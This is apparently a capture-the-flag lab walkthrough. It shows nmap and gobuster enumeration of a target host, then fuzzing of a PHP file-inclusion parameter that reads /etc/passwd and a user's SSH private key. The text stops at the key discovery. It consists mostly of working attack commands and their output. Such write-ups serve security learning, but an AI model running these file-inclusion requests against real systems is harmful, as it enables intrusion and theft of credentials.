Pwned Date - 30th June 2022

Enumeration

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 44:95:50:0b:e4:73:a1:85:11:ca:10:ec:1c:cb:d4:26 (RSA)
|   256 27:db:6a:c7:3a:9c:5a:0e:47:ba:8d:81:eb:d6:d6:3c (ECDSA)
|_  256 e3:07:56:a9:25:63:d4:ce:39:01:c1:9a:d9:fe:de:64 (ED25519)
80/tcp open  http    Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Apache2 Debian Default Page: It works
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

┌──(kali㉿VirtualBox)-[~]
└─$ gobuster dir -u 192.168.125.212 -w /usr/share/wordlists/dirb/common.txt -q -t 200 
/.hta                 (Status: 403) [Size: 280]
/index.html           (Status: 200) [Size: 10701]
/robots.txt           (Status: 200) [Size: 12]   
/secret               (Status: 301) [Size: 319] [--> <http://192.168.125.212/secret/>]
/server-status        (Status: 403) [Size: 280]

End up the /secret got nothing, meanwhile /robots.txt has this

Untitled

Further gobuster what is inside /secret

┌──(kali㉿VirtualBox)-[~]
└─$ gobuster dir -u 192.168.125.212/secret -w /usr/share/wordlists/dirb/common.txt -q -t 200 -x php
/.hta                 (Status: 403) [Size: 280]
/.htpasswd            (Status: 403) [Size: 280]
/.htaccess            (Status: 403) [Size: 280]
/.hta.php             (Status: 403) [Size: 280]
/.htpasswd.php        (Status: 403) [Size: 280]
/.htaccess.php        (Status: 403) [Size: 280]
/evil.php             (Status: 200) [Size: 0]  
/index.html           (Status: 200) [Size: 4]

So we have /secret/evil.php To know what parameter is inside, we need to ffuf it out

Exploitation

Usually during this cases we will need to use ffuf

ffuf -u '<http://192.168.125.212/secret/evil.php?FUZZ=/etc/passwd>' -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -fs 0

Or using gobuster if feeling comfortable

gobuster fuzz -u 192.168.125.212/secret/evil.php?FUZZ=/etc/passwd -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -q -t 200 --exclude-length 0

Quick bingo anyway

┌──(kali㉿VirtualBox)-[~]
└─$ gobuster fuzz -u 192.168.125.212/secret/evil.php?FUZZ=/etc/passwd -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -q -t 200 --exclude-length 0    
Found: [Status=200] [Length=1398] <http://192.168.125.212/secret/evil.php?command=/etc/passwd>

Untitled

From here we know that there is a user called mowree let’s see if he has any ssh key

/home/mowree/.ssh/id_rsa

Another big bingo this time